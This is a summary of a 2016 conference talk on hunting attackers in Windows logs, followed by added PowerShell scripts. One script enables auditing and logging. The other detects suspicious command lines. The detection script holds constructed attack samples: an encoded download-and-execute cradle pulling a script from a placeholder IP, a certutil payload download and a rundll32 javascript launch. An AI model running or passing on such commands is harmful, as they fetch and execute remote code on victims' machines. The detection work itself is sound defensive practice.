SAINTCON 2016 - Michael Gough - Searching Logs for Hackers : What you need to know and how to...
Log analysis is crucial in fighting malware: it detects and tracks security threats and reveals command-line activity, file system changes, and registry changes.
- Logs are a valuable asset in fighting malware, as they can help track the actions of malware and identify potential security threats.
- Most malware is not signed, so unsigned executables are worth flagging; once a system is confirmed infected, re-imaging it is often the best course of action.
- PowerShell is as useful to attackers as it is to administrators and malware researchers, and its activity is hard to see by default, so PowerShell logging (module and script block logging) should be enabled to track it.
- Log management tools such as LogMD and Splunk can help organize and make sense of large volumes of log data.
- It is important to have a robust logging plan in place, including logging of command line activity, file system activity, and registry changes.
- The registry can be a valuable source of information for malware researchers, but it can also be difficult to navigate and interpret.
- Malware can use a variety of techniques to evade detection, including obfuscation, encryption, and innocent-looking file names.
- Log analysis can be a key part of the incident response process, helping to identify the scope of a breach and track the actions of attackers.
- Logs must be protected from tampering, for example by forwarding them off the host as they are written, because they are a valuable source of evidence in the event of a breach.
- Effective log management can help incident responders catch attackers and limit the damage they can cause.
- LogMD is a free tool that can help manage and analyze log data, and is designed to be easy to use and effective in detecting malware.
- Sysmon, a free Sysinternals tool, records process creation, network connections and other system activity in detail and can be used alongside LogMD to detect malware.
- The speaker flags the "death of drydex" (name as transcribed) as a concern for log management, since it is no longer available as a free tool.
- Log management should be seen as a “force multiplier” in the fight against malware, allowing incident responders to detect and respond to attacks quickly and effectively.
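The logging plan the talk calls for (command-line, PowerShell, file system and registry activity) can be turned on with a handful of documented Windows settings. The script below is an added example, not code from the talk or from LogMD; it assumes an elevated PowerShell 5.1+ prompt on a Windows host, and the Security log size, the watched Run key and the Sysmon config path are this example's own choices.

```powershell
# Added example (not from the talk): enable the logging sources a log-based hunt depends on.
# Run from an elevated PowerShell 5.1+ prompt. All keys and subcategories are documented Windows settings.
#Requires -RunAsAdministrator

# 1. Process creation auditing (Security event 4688), with the full command line included.
auditpol /set /subcategory:"Process Creation" /success:enable /failure:enable | Out-Null
$auditKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit'
New-Item -Path $auditKey -Force | Out-Null
Set-ItemProperty -Path $auditKey -Name ProcessCreationIncludeCmdLine_Enabled -Value 1 -Type DWord

# 2. PowerShell module logging (event 4103) and script block logging (event 4104).
$ps = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'
New-Item -Path "$ps\ScriptBlockLogging" -Force | Out-Null
Set-ItemProperty -Path "$ps\ScriptBlockLogging" -Name EnableScriptBlockLogging -Value 1 -Type DWord
New-Item -Path "$ps\ModuleLogging\ModuleNames" -Force | Out-Null
Set-ItemProperty -Path "$ps\ModuleLogging" -Name EnableModuleLogging -Value 1 -Type DWord
Set-ItemProperty -Path "$ps\ModuleLogging\ModuleNames" -Name '*' -Value '*'   # log every module

# 3. File system (4663) and registry (4657) object access auditing.
#    These subcategories only produce events for objects that carry a SACL, so the
#    policy alone logs nothing: add an audit rule to keys worth watching. The Run key
#    is used here as an example of a persistence location (assumption: adjust to taste).
auditpol /set /subcategory:"File System" /success:enable /failure:enable | Out-Null
auditpol /set /subcategory:"Registry" /success:enable /failure:enable | Out-Null

$runKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
$acl  = Get-Acl -Path $runKey -Audit
$rule = New-Object System.Security.AccessControl.RegistryAuditRule(
    'Everyone', 'SetValue,CreateSubKey,Delete', 'ContainerInherit', 'None', 'Success')
$acl.AddAuditRule($rule)
Set-Acl -Path $runKey -AclObject $acl

# 4. Grow the Security log so 4688 events are not overwritten within hours (512 MB is an assumed size).
wevtutil sl Security /ms:536870912

# 5. Optional: Sysmon for richer process/network telemetry. Path to the config file is assumed.
# .\Sysmon64.exe -accepteula -i C:\Tools\sysmonconfig.xml

# 6. Verify what is now in force.
auditpol /get /category:"Detailed Tracking","Object Access"
Get-ItemProperty -Path "$ps\ScriptBlockLogging", "$ps\ModuleLogging"
```

In a domain the same settings belong in Group Policy rather than local registry writes; the keys above are exactly what those policies set, so this script is also a quick way to confirm a GPO actually landed on a host.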
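Once command lines are being logged, the incident-response use the talk describes is searching them for attacker tradecraft. The following is an added example, not the talk's or LogMD's code: a small PowerShell hunt that scores process-creation command lines against a few indicators (encoded and hidden PowerShell, downloaders, LOLBin abuse) and decodes any -EncodedCommand payload. The indicator names and regexes are this example's own, the sample command lines are constructed (with a documentation-range IP), and the two helpers that read live events assume Security 4688 with command-line auditing and PowerShell 4104 script block logging are enabled.

```powershell
# Added example (not from the talk): hunt process-creation command lines for attacker tradecraft.
# Assumes PowerShell 5.1+. The live-log helpers need elevation and the relevant auditing enabled;
# the sample data at the bottom is constructed so the detection logic runs offline.

# Indicators of common living-off-the-land abuse (names and patterns are this example's own).
$SuspiciousPatterns = @(
    @{ Name = 'EncodedCommand'; Regex = '(?i)\s-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}' }
    @{ Name = 'HiddenWindow';   Regex = '(?i)-w(indowstyle)?\s+hidden' }
    @{ Name = 'NoProfile';      Regex = '(?i)-nop(rofile)?\b' }
    @{ Name = 'Downloader';     Regex = '(?i)(downloadstring|downloadfile|invoke-webrequest|\biwr\b|certutil.*-urlcache)' }
    @{ Name = 'IEX';            Regex = '(?i)\b(iex|invoke-expression)\b' }
    @{ Name = 'LOLBin';         Regex = '(?i)\b(mshta|regsvr32|rundll32|wscript|cscript)\.exe\b.*(http|javascript|\.sct|\.hta)' }
)

function ConvertFrom-EncodedCommand {
    # -EncodedCommand takes base64 of UTF-16LE text; return the plaintext if present.
    param([Parameter(Mandatory)][string]$CommandLine)
    if ($CommandLine -match '(?i)\s-e(c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})') {
        try   { return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[2])) }
        catch { return '<not valid base64>' }
    }
}

function Find-SuspiciousCommandLine {
    # Emits one object per command line that matches at least one indicator.
    param([Parameter(Mandatory, ValueFromPipeline)][string]$CommandLine)
    process {
        $hits = foreach ($p in $SuspiciousPatterns) { if ($CommandLine -match $p.Regex) { $p.Name } }
        if (-not $hits) { return }
        [pscustomobject]@{
            Indicators  = @($hits) -join ','
            Decoded     = ConvertFrom-EncodedCommand -CommandLine $CommandLine
            CommandLine = $CommandLine
        }
    }
}

function Get-ProcessCommandLine {
    # CommandLine field of recent Security 4688 events (empty unless command-line auditing is on).
    param([int]$MaxEvents = 1000)
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688 } -MaxEvents $MaxEvents |
        ForEach-Object {
            $xml = [xml]$_.ToXml()
            ($xml.Event.EventData.Data | Where-Object { $_.Name -eq 'CommandLine' }).'#text'
        } |
        Where-Object { $_ }
}

function Get-ScriptBlockText {
    # ScriptBlockText of recent PowerShell 4104 events; the same indicators apply to this text.
    param([int]$MaxEvents = 1000)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } -MaxEvents $MaxEvents |
        ForEach-Object { $_.Properties[2].Value }
}

# --- Constructed sample data (not real log lines). The payload is base64-encoded here so the decode path is exercised.
$payload = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/stage.ps1')"
$b64     = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
$samples = @(
    'C:\Windows\System32\notepad.exe C:\Users\alice\notes.txt'
    "powershell.exe -NoP -W Hidden -Enc $b64"
    'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new ActiveXObject("WScript.Shell")'
    'certutil.exe -urlcache -split -f http://203.0.113.10/a.exe C:\Users\Public\a.exe'
    'powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1'
)

# Offline run: notepad and the signed backup script pass; the other three are flagged,
# and the encoded sample is shown with its decoded downloader.
$samples | Find-SuspiciousCommandLine | Format-List

# Against live logs (elevated, auditing enabled):
#   Get-ProcessCommandLine | Find-SuspiciousCommandLine
#   Get-ScriptBlockText    | Find-SuspiciousCommandLine
```

The point of decoding rather than just flagging -EncodedCommand is scoping: the decoded text is where the download URL, the staging path or the next-stage host actually lives, which is what an incident responder needs to pivot on across the rest of the logs. Expect tuning: legitimate automation also uses -NoProfile and -WindowStyle Hidden, so treat single indicators as leads and combinations as alerts.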